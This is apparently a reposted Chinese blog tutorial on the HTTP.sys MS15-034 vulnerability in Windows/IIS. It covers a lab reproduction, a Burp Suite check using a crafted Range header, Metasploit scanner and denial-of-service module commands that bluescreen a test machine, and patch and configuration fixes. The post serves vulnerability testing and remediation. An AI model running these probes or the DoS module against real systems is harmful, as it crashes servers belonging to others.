HTTP.sys远程代码执行漏洞修复
大家好,又见面了,我是你们的朋友全栈君。
1.漏洞描述
Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008 R2和WindowsServer 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞,远程攻击者可以通过IIS7(或更高版本)服务将恶意的HTTP请求传递给HTTP.sys驱动,通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。
2.复现环境
win7+IIS7
3.漏洞确认
访问IIS界面,使用burpsuite抓包,发送到repeater中,在HTTP请求头中加入如下字段 Range: bytes=18-18446744073709551615 ,返回416状态码
4.漏洞利用
使用kali的metasploit msconsole search ms15-034
验证漏洞的方法 use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 192.168.1.200 run
利用漏洞的方法 use auxiliary/dos/http/ms15_034_ulonglongadd set rhosts 192.168.1.200 set threads 10 run
实验电脑已经蓝屏
5.漏洞修复
方法1:微软官方网站下载ms15-034的补丁包 下载地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 代表性补丁: Windows Server 2008 R2(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46480 Windows Server 2012(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46481 Windows Server 2012 R2(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46500
方法2:网上的其他方法验证 IIS-功能视图-输出缓存-操作-编辑功能设置-启用内核缓存,取消勾选。 注意: 在网站-default web site下的输出缓存,不是根目录下的输出缓存; 修改后,漏洞验证仍显示存在,但漏洞利用已不再蓝屏;
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/161443.html原文链接:https://javaforall.cn
相关文章
- 使用 http-proxy 代理 HTTP 请求时遇到的 the requested url is invalid 错误消息
- HTTP.SYS远程代码执行漏洞
- HTTP.SYS远程代码执行漏洞(MS15-034)
- IIS7 HTTP.sys远程代码执行漏洞
- HTTP.SYS远程代码执行漏洞测试
- 漏洞复现- - -IIS解析漏洞在fckEditor上传攻击中的利用
- Go HTTP 编程 | 01 - 使用 http 包创建 Web 服务器
- 提高警惕!黑客在GitHub上利用虚假 PoC 漏洞钓鱼
- 【经验】使用http访问一个链接提示400的错误,但是在浏览器访问没问题(server returned HTTP Response code :400 fro URL:),怎么解决
- 奔驰、宝马等汽车品牌存在 API 漏洞,可能暴露车主个人信息
- 被曝高危漏洞,威胁行为者可获取Amazon Photos文件访问权限
- 端口Linux查看HTTP端口:一步一步指南(linux查看http)
- Linux搭建HTTP代理实现网络自由访问(linux搭建http代理)
- Linux内核被发现新的安全漏洞 非特权用户可利用漏洞获得root权限
- 研究人员公布Windows 10 HTTP协议漏洞的概念验证 微软已在本月进行修复
- CVE-2018-4990 Adobe Reader代码执行漏洞利用分析
- Optionsbleed 漏洞泄露 Apache Server 的内存信息
- 初识linux内核漏洞利用
- HTTP请求在Linux下的实现(http请求linux)
- Linux下快速访问HTTP(linux 访问http)
- Linux快速搭建超强HTTP服务器(linux搭建http服务器)
- 内网Redis服务器的安全漏洞审查(内网redis漏洞)
- 让德国黑客能“监控”美国国会议员的全球电信网络“7号信令”漏洞,你也在用!
- ASP.NET笔记之Session、http、web开发原则、xss漏洞的详细介绍